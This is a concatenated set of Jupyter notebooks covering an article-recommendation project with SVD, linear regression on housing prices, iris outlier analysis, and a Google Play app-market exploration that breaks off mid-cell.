"def get_article_order(user_id,counts):\n '''\n INPUT:\n user_id - (int)\n counts - (pandas Series) value_counts\n \n OUTPUT:\n top_articles - (list) A list of article id sorted by interactions\n \n '''\n ids,titles = get_user_articles(user_id)\n dic = {}\n for this_id in ids:\n dic[this_id] = counts[this_id]\n dic_sort = sorted(dic.items(), key=lambda d:d[1], reverse = True)\n article_order = [item[0] for item in dic_sort]\n return article_order",
"_____no_output_____"
],
[
"def get_top_sorted_users(user_id, df=df, user_item=user_item):\n '''\n INPUT:\n user_id - (int)\n df - (pandas dataframe) df as defined at the top of the notebook \n user_item - (pandas dataframe) matrix of users by articles: \n 1's when a user has interacted with an article, 0 otherwise\n \n \n OUTPUT:\n neighbors_df - (pandas dataframe) a dataframe with:\n neighbor_id - is a neighbor user_id\n similarity - measure of the similarity of each user to the provided user_id\n num_interactions - the number of articles viewed by the user - if a u\n \n Other Details - sort the neighbors_df by the similarity and then by number of interactions where \n highest of each is higher in the dataframe\n \n '''\n neighbors_df = pd.DataFrame()\n neighbor_id = []\n similarity = []\n num_interactions = []\n for user in df.user_id:\n if user == user_id:\n continue\n neighbor_id.append(user)\n score = np.dot(np.array(user_item.loc[user_id]),np.array(user_item.loc[user]).T)\n similarity.append(score)\n interactions = len(df[df.user_id == user])\n num_interactions.append(interactions)\n neighbors_df = pd.DataFrame({'neighbor_id':neighbor_id,'similarity':similarity,'num_interactions':num_interactions})\n neighbors_df = neighbors_df.sort_values(by=['similarity','num_interactions'])\n return neighbors_df # Return the dataframe specified in the doc_string\n\n\ndef user_user_recs_part2(user_id, m=10,df=df):\n '''\n INPUT:\n user_id - (int) a user id\n m - (int) the number of recommendations you want for the user\n \n OUTPUT:\n recs - (list) a list of recommendations for the user by article id\n rec_names - (list) a list of recommendations for the user by article title\n \n Description:\n Loops through the users based on closeness to the input user_id\n For each user - finds articles the user hasn't seen before and provides them as recs\n Does this until m recommendations are found\n \n Notes:\n * Choose the users that have the most total article interactions \n before choosing those with fewer article interactions.\n\n * Choose articles with the articles with the most total interactions \n before choosing those with fewer total interactions. \n \n '''\n recs = []\n neighbors_df = get_top_sorted_users(user_id)\n seen_aritcle,_ = get_user_articles(user_id)\n neighbors_id = neighbors_df['neighbor_id'].values\n counts = df.article_id.value_counts()\n for neighbor in neighbors_id:\n if len(recs) == m:\n break\n new_rec = get_article_order(neighbor, counts)\n\n for this_rec in new_rec:\n if this_rec not in recs:\n recs.append(this_rec)\n if len(recs) == m:\n break\n\n rec_names = get_article_names(recs)\n return recs, rec_names",
"_____no_output_____"
],
[
"# Quick spot check - don't change this code - just use it to test your functions\nrec_ids, rec_names = user_user_recs_part2(20, 10)\nprint(\"The top 10 recommendations for user 20 are the following article ids:\")\nprint(rec_ids)\nprint()\nprint(\"The top 10 recommendations for user 20 are the following article names:\")\nprint(rec_names)",
"The top 10 recommendations for user 20 are the following article ids:\n['173.0', '1432.0', '1431.0', '593.0', '1162.0', '18.0', '911.0', '111.0', '1436.0', '880.0']\n\nThe top 10 recommendations for user 20 are the following article names:\n['10 must attend data science, ml and ai conferences in 2018', 'visualize data with the matplotlib library', 'visualize car data with brunel', 'upload files to ibm data science experience using the command line', 'analyze energy consumption in buildings', 'the greatest public datasets for ai – startup grind', 'using machine learning to predict baseball injuries', 'tidy up your jupyter notebooks with scripts', 'welcome to pixiedust', 'probabilistic graphical models tutorial\\u200a—\\u200apart 1 – stats and bots']\n"
]
],
[
[
"`5.` Use your functions from above to correctly fill in the solutions to the dictionary below. Then test your dictionary against the solution. Provide the code you need to answer each following the comments below.",
"_____no_output_____"
]
],
[
[
"### Tests with a dictionary of results\n\nuser1_most_sim = find_similar_users(1)[0]# Find the user that is most similar to user 1 \nuser131_10th_sim = find_similar_users(131)[9]# Find the 10th most similar user to user 131",
"_____no_output_____"
],
[
"## Dictionary Test Here\nsol_5_dict = {\n 'The user that is most similar to user 1.': user1_most_sim, \n 'The user that is the 10th most similar to user 131': user131_10th_sim,\n}\n\nt.sol_5_test(sol_5_dict)",
"This all looks good! Nice job!\n"
]
],
[
[
"`6.` If we were given a new user, which of the above functions would you be able to use to make recommendations? Explain. Can you think of a better way we might make recommendations? Use the cell below to explain a better method for new users.",
"_____no_output_____"
],
[
"A new user has no reading records,so it isn't able to find what the user like base on records.I will use get_top_articles to recommend some popular articles.I think a better way to impove make recommendations is to categorize articles, and randomly recommend top articles of every categorize ,this help us have more understanding of the user.",
"_____no_output_____"
],
[
"`7.` Using your existing functions, provide the top 10 recommended articles you would provide for the a new user below. You can test your function against our thoughts to make sure we are all on the same page with how we might make a recommendation.",
"_____no_output_____"
]
],
[
[
"new_user = '0.0'\n\n# What would your recommendations be for this new user '0.0'? As a new user, they have no observed articles.\n# Provide a list of the top 10 article ids you would give to \nnew_user_recs = df['article_id'].value_counts().axes[0][:10].tolist()# Your recommendations here\n\n",
"_____no_output_____"
],
[
"assert set(new_user_recs) == set(['1314.0','1429.0','1293.0','1427.0','1162.0','1364.0','1304.0','1170.0','1431.0','1330.0']), \"Oops! It makes sense that in this case we would want to recommend the most popular articles, because we don't know anything about these users.\"\n\nprint(\"That's right! Nice job!\")",
"That's right! Nice job!\n"
]
],
[
[
"### <a class=\"anchor\" id=\"Matrix-Fact\">Part IV: Matrix Factorization</a>\n\nIn this part of the notebook, you will build use matrix factorization to make article recommendations to the users on the IBM Watson Studio platform.\n\n`1.` You should have already created a **user_item** matrix above in **question 1** of **Part III** above. This first question here will just require that you run the cells to get things set up for the rest of **Part V** of the notebook. ",
"_____no_output_____"
]
],
[
[
"# Load the matrix here\nuser_item_matrix = pd.read_pickle('user_item_matrix.p')",
"_____no_output_____"
],
[
"# quick look at the matrix\nuser_item_matrix.head()",
"_____no_output_____"
]
],
[
[
"`2.` In this situation, you can use Singular Value Decomposition from [numpy](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.linalg.svd.html) on the user-item matrix. Use the cell to perform SVD, and explain why this is different than in the lesson.",
"_____no_output_____"
]
],
[
[
"# Perform SVD on the User-Item Matrix Here\n\nu, s, vt = np.linalg.svd(user_item_matrix)# use the built in to get the three matrices",
"_____no_output_____"
]
],
[
[
"in the lessson ,there are missing values in matrix,but in this project , if users and articles don't have interacted with each other,the values is 0,so matrix has no missing values and the code won't cause any error.",
"_____no_output_____"
],
[
"**Provide your response here.**",
"_____no_output_____"
],
[
"`3.` Now for the tricky part, how do we choose the number of latent features to use? Running the below cell, you can see that as the number of latent features increases, we obtain a lower error rate on making predictions for the 1 and 0 values in the user-item matrix. Run the cell below to get an idea of how the accuracy improves as we increase the number of latent features.",
"_____no_output_____"
]
],
[
[
"num_latent_feats = np.arange(10,700+10,20)\nsum_errs = []\n\nfor k in num_latent_feats:\n # restructure with k latent features\n s_new, u_new, vt_new = np.diag(s[:k]), u[:, :k], vt[:k, :]\n \n # take dot product\n user_item_est = np.around(np.dot(np.dot(u_new, s_new), vt_new))\n \n # compute error for each prediction to actual value\n diffs = np.subtract(user_item_matrix, user_item_est)\n \n # total errors and keep track of them\n err = np.sum(np.sum(np.abs(diffs)))\n sum_errs.append(err)\n \n \nplt.plot(num_latent_feats, 1 - np.array(sum_errs)/df.shape[0]);\nplt.xlabel('Number of Latent Features');\nplt.ylabel('Accuracy');\nplt.title('Accuracy vs. Number of Latent Features');",
"_____no_output_____"
]
],
[
[
"`4.` From the above, we can't really be sure how many features to use, because simply having a better way to predict the 1's and 0's of the matrix doesn't exactly give us an indication of if we are able to make good recommendations. Instead, we might split our dataset into a training and test set of data, as shown in the cell below. \n\nUse the code from question 3 to understand the impact on accuracy of the training and test sets of data with different numbers of latent features. Using the split below: \n\n* How many users can we make predictions for in the test set? \n* How many users are we not able to make predictions for because of the cold start problem?\n* How many movies can we make predictions for in the test set? \n* How many movies are we not able to make predictions for because of the cold start problem?",
"_____no_output_____"
]
],
[
[
"df_train = df.head(40000)\ndf_test = df.tail(5993)\n\ndef create_test_and_train_user_item(df_train, df_test):\n '''\n INPUT:\n df_train - training dataframe\n df_test - test dataframe\n \n OUTPUT:\n user_item_train - a user-item matrix of the training dataframe \n (unique users for each row and unique articles for each column)\n user_item_test - a user-item matrix of the testing dataframe \n (unique users for each row and unique articles for each column)\n test_idx - all of the test user ids\n test_arts - all of the test article ids\n \n '''\n \n user_item_train = create_user_item_matrix(df_train)\n train_idx = user_item_train.index.tolist()\n train_arts = user_item_train.columns.tolist()\n \n user_item_test = create_user_item_matrix(df_test)\n test_idx = user_item_test.index.tolist()\n test_arts = user_item_test.columns.tolist()\n # choose user_ids and article_ids that have exit in train data \n common_idx = np.intersect1d(train_idx,test_idx)\n common_arts = np.intersect1d(train_arts,test_arts)\n user_item_test = user_item_test.loc[common_idx,common_arts]\n return user_item_train, user_item_test, test_idx, test_arts\n\nuser_item_train, user_item_test, test_idx, test_arts = create_test_and_train_user_item(df_train, df_test)",
"_____no_output_____"
],
[
"user_item_test.shape[0]",
"_____no_output_____"
],
[
"print(len(test_idx)-user_item_test.shape[0])",
"662\n"
],
[
"print(len(test_arts))",
"574\n"
],
[
"print(len(test_arts)-user_item_test.shape[1])",
"0\n"
],
[
"# Replace the values in the dictionary below\na = 662 \nb = 574 \nc = 20 \nd = 0 \n\n\nsol_4_dict = {\n 'How many users can we make predictions for in the test set?':c,\n 'How many users in the test set are we not able to make predictions for because of the cold start problem?': a,\n 'How many movies can we make predictions for in the test set?': b,\n 'How many movies in the test set are we not able to make predictions for because of the cold start problem?': d\n}\n\nt.sol_4_test(sol_4_dict)",
"Awesome job! That's right! All of the test movies are in the training data, but there are only 20 test users that were also in the training set. All of the other users that are in the test set we have no data on. Therefore, we cannot make predictions for these users using SVD.\n"
]
],
[
[
"`5.` Now use the **user_item_train** dataset from above to find **U**, **S**, and **V** transpose using SVD. Then find the subset of rows in the **user_item_test** dataset that you can predict using this matrix decomposition with different numbers of latent features to see how many features makes sense to keep based on the accuracy on the test data. This will require combining what was done in questions `2` - `4`.\n\nUse the cells below to explore how well SVD works towards making predictions for recommendations on the test data. ",
"_____no_output_____"
]
],
[
[
"# fit SVD on the user_item_train matrix\nu_train, s_train, vt_train = np.linalg.svd(user_item_train)# fit svd similar to above then use the cells below",
"_____no_output_____"
],
[
"user_item_test.head(2)",
"_____no_output_____"
],
[
"def get_error(s,u,v,user_item,k=100):\n '''\n INPUT:\n s,u,v: result of svd training\n user_item:user_item matrices\n k: - (int) numbers of latent feature\n OUTPUT:\n err - error\n \n '''\n s_new, u_new, vt_new = np.diag(s[:k]), u[:, :k], v[:k, :]\n # take dot product\n user_item_est = np.around(np.dot(np.dot(u_new, s_new), vt_new))\n\n # compute error for each prediction to actual value\n diffs = np.subtract(user_item, user_item_est)\n\n # total errors and keep track of them\n err = np.sum(np.sum(np.abs(diffs)))/(diffs.shape[0] * diffs.shape[1])\n return err",
"_____no_output_____"
],
[
"# decomposition to predict on test data\n# restructure with k latent features\nnum_latent_feats = np.arange(10,700+10,20)\npredict_list = []\ntrain_list = []\nfor k in num_latent_feats:\n # get test result \n article_index = []\n for article in user_item_test.columns.tolist():\n article_index.append(user_item_train.columns.get_loc(article))\n \n user_index = []\n for user in user_item_test.index.tolist():\n user_index.append(user_item_train.index.get_loc(user))\n \n u_test = u_train[user_index,:]\n vt_test = vt_train[:,article_index]\n # training and testing \n predict = 1 - get_error(s_train,u_test,vt_test,user_item=user_item_test,k=k)\n train = 1- get_error(s_train,u_train,vt_train,user_item=user_item_train,k=k)\n predict_list.append(predict)\n train_list.append(train)",
"_____no_output_____"
],
[
"plt.plot(num_latent_feats,predict_list,num_latent_feats,train_list,'r')\nplt.legend(('test', 'trainr'), loc='center right')\nplt.title('training and testing accuracy of different K')\nplt.xlabel('numbers of latent features')\nplt.ylabel('Accuracy')\nplt.show()",
"_____no_output_____"
]
],
[
[
"`6.` Use the cell below to comment on the results you found in the previous question. Given the circumstances of your results, discuss what you might do to determine if the recommendations you make with any of the above recommendation systems are an improvement to how users currently find articles? ",
"_____no_output_____"
],
[
"- training error and testing error are both very high,because the data is sparse,most labels are 0.\n- Fisrt,If the user is new ,I would use get_top_articles to recommend articles for the user.Otherwise,I will find the most similar users based on the articles users have read,and recommend articles for the user which similar users have read but the user haven't.\n- Then,I am going to use A/B test to find out weather my recommendation systems works.I will ramdomly choose two groups of users.One group read articles from the old system,and one group receive articles from my recommendation system.Finaly I will compare two groups of click rates.\n",
"_____no_output_____"
],
[
"<a id='conclusions'></a>\n### Extras\nUsing your workbook, you could now save your recommendations for each user, develop a class to make new predictions and update your results, and make a flask app to deploy your results. These tasks are beyond what is required for this project. However, from what you learned in the lessons, you certainly capable of taking these tasks on to improve upon your work here!\n\n\n## Conclusion\n\n> Congratulations! You have reached the end of the Recommendations with IBM project! \n\n> **Tip**: Once you are satisfied with your work here, check over your report to make sure that it is satisfies all the areas of the [rubric](https://review.udacity.com/#!/rubrics/2322/view). You should also probably remove all of the \"Tips\" like this one so that the presentation is as polished as possible.\n\n\n## Directions to Submit\n\n> Before you submit your project, you need to create a .html or .pdf version of this notebook in the workspace here. To do that, run the code cell below. If it worked correctly, you should get a return code of 0, and you should see the generated .html file in the workspace directory (click on the orange Jupyter icon in the upper left).\n\n> Alternatively, you can download this report as .html via the **File** > **Download as** submenu, and then manually upload it into the workspace directory by clicking on the orange Jupyter icon in the upper left, then using the Upload button.\n\n> Once you've done this, you can submit your project by clicking on the \"Submit Project\" button in the lower right here. This will create and submit a zip file with this .ipynb doc and the .html or .pdf version you created. Congratulations! ",
"_____no_output_____"
]
],
[
[
"from subprocess import call\ncall(['python', '-m', 'nbconvert', 'Recommendations_with_IBM.ipynb'])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb02947fc0bdb76e5b7bf79ecf4b6055f267f2c0 | 74,908 | ipynb | Jupyter Notebook | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | 1 | 2018-12-13T08:11:52.000Z | 2018-12-13T08:11:52.000Z | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | null | null | null | 01-Linear Regression with Python.ipynb | AhmetTuranBalkan/ML-Algorithms | aa72ce43e88689ef1425f09bc9c2519a03170165 | [
"MIT"
] | 3 | 2020-04-22T11:50:06.000Z | 2021-05-19T12:20:14.000Z | 124.431894 | 44,096 | 0.837227 | [
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n%matplotlib inline",
"_____no_output_____"
],
[
"df = pd.read_csv('USA_Housing.csv')\n# The dataset is taken from Kaggle. The specific URL is https://www.kaggle.com/vedavyasv/usa-housing",
"_____no_output_____"
],
[
"sns.heatmap(df.corr() ,annot =True)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 5000 entries, 0 to 4999\nData columns (total 7 columns):\nAvg. Area Income 5000 non-null float64\nAvg. Area House Age 5000 non-null float64\nAvg. Area Number of Rooms 5000 non-null float64\nAvg. Area Number of Bedrooms 5000 non-null float64\nArea Population 5000 non-null float64\nPrice 5000 non-null float64\nAddress 5000 non-null object\ndtypes: float64(6), object(1)\nmemory usage: 273.5+ KB\n"
],
[
"df.describe()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"X = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. Area Number of Bedrooms', 'Area Population']]\ny = df['Price']",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)",
"_____no_output_____"
]
],
[
[
"## Creating and Training the Model",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"lm = LinearRegression()",
"_____no_output_____"
],
[
"lm.fit(X_train,y_train)",
"_____no_output_____"
]
],
[
[
"## Model Evaluation\n\n",
"_____no_output_____"
]
],
[
[
"coeff_df = pd.DataFrame(lm.coef_,X.columns,columns=['Coefficient'])\ncoeff_df",
"_____no_output_____"
],
[
"predictions = lm.predict(X_test)\nplt.scatter(y_test,predictions)\nplt.show()",
"_____no_output_____"
],
[
"from sklearn import metrics",
"_____no_output_____"
],
[
"print('MAE:', metrics.mean_absolute_error(y_test, predictions))\nprint('MSE:', metrics.mean_squared_error(y_test, predictions))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, predictions)))",
"MAE: 82288.2225191\nMSE: 10460958907.2\nRMSE: 102278.829223\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb029e6916d5bbd0963c214d0a1b51e49e2d712e | 51,322 | ipynb | Jupyter Notebook | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | Pt_1/05_08_Extreme_value_analysis_using_univariate_methods/05_08_end.ipynb | vladcuevas/Python-Data-Science-Labs | eb7b2fa94402f396ed6fd5d4de62f89f930da458 | [
"MIT"
] | null | null | null | 250.35122 | 36,400 | 0.653209 | [
[
[
"# Chapter 5 - Outlier Analysis\n## Segment 8 - Extreme value analysis using univariate methods",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams",
"_____no_output_____"
],
[
"%matplotlib inline\nrcParams['figure.figsize'] = 5,4",
"_____no_output_____"
],
[
"import pathlib\nimport os\naddress = pathlib.Path(os.getcwd()).parent\naddress = pathlib.Path(os.path.join(address, 'Data/iris.data.csv'))",
"_____no_output_____"
],
[
"df = pd.read_csv(filepath_or_buffer=address, header=None, sep=',')\n\ndf.columns=['Sepal Length','Sepal Width','Petal Length','Petal Width', 'Species']",
"_____no_output_____"
],
[
"X = df.iloc[:,0:4].values\ny = df.iloc[:,4].values\ndf[:5]",
"_____no_output_____"
]
],
[
[
"### Identifying outliers from Tukey boxplots",
"_____no_output_____"
]
],
[
[
"df.boxplot(return_type='dict')\nplt.plot()",
"_____no_output_____"
],
[
"Sepal_Width = X[:,1]\niris_outliers = (Sepal_Width > 4)\ndf[iris_outliers]",
"_____no_output_____"
],
[
"Sepal_Width = X[:,1]\niris_outliers = (Sepal_Width < 2.05)\ndf[iris_outliers]",
"_____no_output_____"
]
],
[
[
"### Applying Tukey outlier labeling",
"_____no_output_____"
]
],
[
[
"pd.options.display.float_format = '{:.1f}'.format\nX_df = pd.DataFrame(X)\nprint(X_df.describe())",
"0 1 2 3\ncount 150.0 150.0 150.0 150.0\nmean 5.8 3.1 3.8 1.2\nstd 0.8 0.4 1.8 0.8\nmin 4.3 2.0 1.0 0.1\n25% 5.1 2.8 1.6 0.3\n50% 5.8 3.0 4.3 1.3\n75% 6.4 3.3 5.1 1.8\nmax 7.9 4.4 6.9 2.5\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb029efc94bcfd0bc7f0c7c0f915bec3c637d7b1 | 613,806 | ipynb | Jupyter Notebook | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | App market.ipynb | Simonm952/simonm952.github.io | 745a36d8487a9caf9dc2e8d05f148581481db6c0 | [
"Unlicense"
] | null | null | null | 306,903 | 613,805 | 0.751918 | [
[
[
"## 1. Google Play Store apps and reviews\n<p>Mobile apps are everywhere. They are easy to create and can be lucrative. Because of these two factors, more and more apps are being developed. In this notebook, we will do a comprehensive analysis of the Android app market by comparing over ten thousand apps in Google Play across different categories. We'll look for insights in the data to devise strategies to drive growth and retention.</p>\n<p><img src=\"https://assets.datacamp.com/production/project_619/img/google_play_store.png\" alt=\"Google Play logo\"></p>\n<p>Let's take a look at the data, which consists of two files:</p>\n<ul>\n<li><code>apps.csv</code>: contains all the details of the applications on Google Play. There are 13 features that describe a given app.</li>\n<li><code>user_reviews.csv</code>: contains 100 reviews for each app, <a href=\"https://www.androidpolice.com/2019/01/21/google-play-stores-redesigned-ratings-and-reviews-section-lets-you-easily-filter-by-star-rating/\">most helpful first</a>. The text in each review has been pre-processed and attributed with three new features: Sentiment (Positive, Negative or Neutral), Sentiment Polarity and Sentiment Subjectivity.</li>\n</ul>",
"_____no_output_____"
]
],
[
[
"# Read in dataset\nimport pandas as pd\nimport pandas as pd\napps_with_duplicates = pd.read_csv('datasets/apps.csv')\n\n# Drop duplicates\napps = apps_with_duplicates.drop_duplicates()\n\n# Print the total number of apps\nprint('Total number of apps in the dataset = ', apps.shape[0])\n\n# Have a look at a random sample of 5 entries\nn = 5\napps.sample(n)\n",
"Total number of apps in the dataset = 9659\n"
]
],
[
[
"## 2. Data cleaning\n<p>The four features that we will be working with most frequently henceforth are <code>Installs</code>, <code>Size</code>, <code>Rating</code> and <code>Price</code>. The <code>info()</code> function (from the previous task) told us that <code>Installs</code> and <code>Price</code> columns are of type <code>object</code> and not <code>int64</code> or <code>float64</code> as we would expect. This is because the column contains some characters more than just [0,9] digits. Ideally, we would want these columns to be numeric as their name suggests. <br>\nHence, we now proceed to data cleaning and prepare our data to be consumed in our analyis later. Specifically, the presence of special characters (<code>, $ +</code>) in the <code>Installs</code> and <code>Price</code> columns make their conversion to a numerical data type difficult.</p>",
"_____no_output_____"
]
],
[
[
"# List of characters to remove\nchars_to_remove = ['+',\",\",\"$\"]\n# List of column names to clean\ncols_to_clean = [\"Installs\",\"Price\"]\n\n# Loop for each column\nfor col in cols_to_clean:\n # Replace each character with an empty string\n for char in chars_to_remove:\n apps[col] = apps[col].astype(str).str.replace(char, '')\n # Convert col to numeric\n apps[col] = pd.to_numeric( apps[col]) ",
"_____no_output_____"
]
],
[
[
"## 3. Exploring app categories\n<p>With more than 1 billion active users in 190 countries around the world, Google Play continues to be an important distribution platform to build a global audience. For businesses to get their apps in front of users, it's important to make them more quickly and easily discoverable on Google Play. To improve the overall search experience, Google has introduced the concept of grouping apps into categories.</p>\n<p>This brings us to the following questions:</p>\n<ul>\n<li>Which category has the highest share of (active) apps in the market? </li>\n<li>Is any specific category dominating the market?</li>\n<li>Which categories have the fewest number of apps?</li>\n</ul>\n<p>We will see that there are <code>33</code> unique app categories present in our dataset. <em>Family</em> and <em>Game</em> apps have the highest market prevalence. Interestingly, <em>Tools</em>, <em>Business</em> and <em>Medical</em> apps are also at the top.</p>",
"_____no_output_____"
]
],
[
[
"import plotly\nplotly.offline.init_notebook_mode(connected=True)\nimport plotly.graph_objs as go\n\n# Print the total number of unique categories\nnum_categories = len(apps[\"Category\"].unique())\nprint('Number of categories = ', num_categories)\n\n# Count the number of apps in each 'Category' and sort them in descending order\nnum_apps_in_category = apps[\"Category\"].value_counts().sort_values(ascending = False)\n\ndata = [go.Bar(\n x = num_apps_in_category.index, # index = category name\n y = num_apps_in_category.values, # value = count\n)]\n\nplotly.offline.iplot(data)",
"_____no_output_____"
]
],
[
[
"## 4. Distribution of app ratings\n<p>After having witnessed the market share for each category of apps, let's see how all these apps perform on an average. App ratings (on a scale of 1 to 5) impact the discoverability, conversion of apps as well as the company's overall brand image. Ratings are a key performance indicator of an app.</p>\n<p>From our research, we found that the average volume of ratings across all app categories is <code>4.17</code>. The histogram plot is skewed to the right indicating that the majority of the apps are highly rated with only a few exceptions in the low-rated apps.</p>",
"_____no_output_____"
]
],
[
[
"# Average rating of apps\navg_app_rating = apps['Rating'].mean()\nprint('Average app rating = ', avg_app_rating)\n\n# Distribution of apps according to their ratings\ndata = [go.Histogram(\n x = apps['Rating']\n)]\n\n# Vertical dashed line to indicate the average app rating\nlayout = {'shapes': [{\n 'type' :'line',\n 'x0': avg_app_rating,\n 'y0': 0,\n 'x1': avg_app_rating,\n 'y1': 1000,\n 'line': { 'dash': 'dashdot'}\n }]\n }\n\nplotly.offline.iplot({'data': data, 'layout': layout})",
"Average app rating = 4.173243045387994\n"
]
],
[
[
"## 5. Size and price of an app\n<p>Let's now examine app size and app price. For size, if the mobile app is too large, it may be difficult and/or expensive for users to download. Lengthy download times could turn users off before they even experience your mobile app. Plus, each user's device has a finite amount of disk space. For price, some users expect their apps to be free or inexpensive. These problems compound if the developing world is part of your target market; especially due to internet speeds, earning power and exchange rates.</p>\n<p>How can we effectively come up with strategies to size and price our app?</p>\n<ul>\n<li>Does the size of an app affect its rating? </li>\n<li>Do users really care about system-heavy apps or do they prefer light-weighted apps? </li>\n<li>Does the price of an app affect its rating? </li>\n<li>Do users always prefer free apps over paid apps?</li>\n</ul>\n<p>We find that the majority of top rated apps (rating over 4) range from 2 MB to 20 MB. We also find that the vast majority of apps price themselves under \\$10.</p>",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Filter rows where both Rating and Size values are not null\napps_with_size_and_rating_present = apps[(~apps[\"Rating\"].isnull()) & (~apps[\"Size\"].isnull())]\n\n# Subset for categories with at least 250 apps\nlarge_categories = apps_with_size_and_rating_present.groupby(\"Category\").filter(lambda x: len(x) >= 250).reset_index()\n\n# Plot size vs. rating\nplt1 = sns.jointplot(x = large_categories[\"Size\"], y = large_categories[\"Rating\"], kind = 'hex')\n\n# Subset apps whose 'Type' is 'Paid'\npaid_apps = apps_with_size_and_rating_present[apps_with_size_and_rating_present[\"Type\"] == \"Paid\"]\n\n# Plot price vs. rating\nplt2 = sns.jointplot(x = paid_apps[\"Price\"], y = paid_apps[\"Rating\"])",
"_____no_output_____"
]
],
[
[
"## 6. Relation between app category and app price\n<p>So now comes the hard part. How are companies and developers supposed to make ends meet? What monetization strategies can companies use to maximize profit? The costs of apps are largely based on features, complexity, and platform.</p>\n<p>There are many factors to consider when selecting the right pricing strategy for your mobile app. It is important to consider the willingness of your customer to pay for your app. A wrong price could break the deal before the download even happens. Potential customers could be turned off by what they perceive to be a shocking cost, or they might delete an app they’ve downloaded after receiving too many ads or simply not getting their money's worth.</p>\n<p>Different categories demand different price ranges. Some apps that are simple and used daily, like the calculator app, should probably be kept free. However, it would make sense to charge for a highly-specialized medical app that diagnoses diabetic patients. Below, we see that <em>Medical and Family</em> apps are the most expensive. Some medical apps extend even up to \\$80! All game apps are reasonably priced below \\$20.</p>",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nfig, ax = plt.subplots()\nfig.set_size_inches(15, 8)\n\n# Select a few popular app categories\npopular_app_cats = apps[apps.Category.isin(['GAME', 'FAMILY', 'PHOTOGRAPHY',\n 'MEDICAL', 'TOOLS', 'FINANCE',\n 'LIFESTYLE','BUSINESS'])]\n\n# Examine the price trend by plotting Price vs Category\nax = sns.stripplot(x = popular_app_cats[\"Price\"], y = popular_app_cats[\"Category\"], jitter=True, linewidth=1)\nax.set_title('App pricing trend across categories')\n\n# Apps whose Price is greater than 200\napps_above_200 = popular_app_cats[['Category', 'App', 'Price']][popular_app_cats[\"Price\"] > 200]\napps_above_200",
"_____no_output_____"
]
],
[
[
"## 7. Filter out \"junk\" apps\n<p>It looks like a bunch of the really expensive apps are \"junk\" apps. That is, apps that don't really have a purpose. Some app developer may create an app called <em>I Am Rich Premium</em> or <em>most expensive app (H)</em> just for a joke or to test their app development skills. Some developers even do this with malicious intent and try to make money by hoping people accidentally click purchase on their app in the store.</p>\n<p>Let's filter out these junk apps and re-do our visualization. The distribution of apps under \\$20 becomes clearer.</p>",
"_____no_output_____"
]
],
[
[
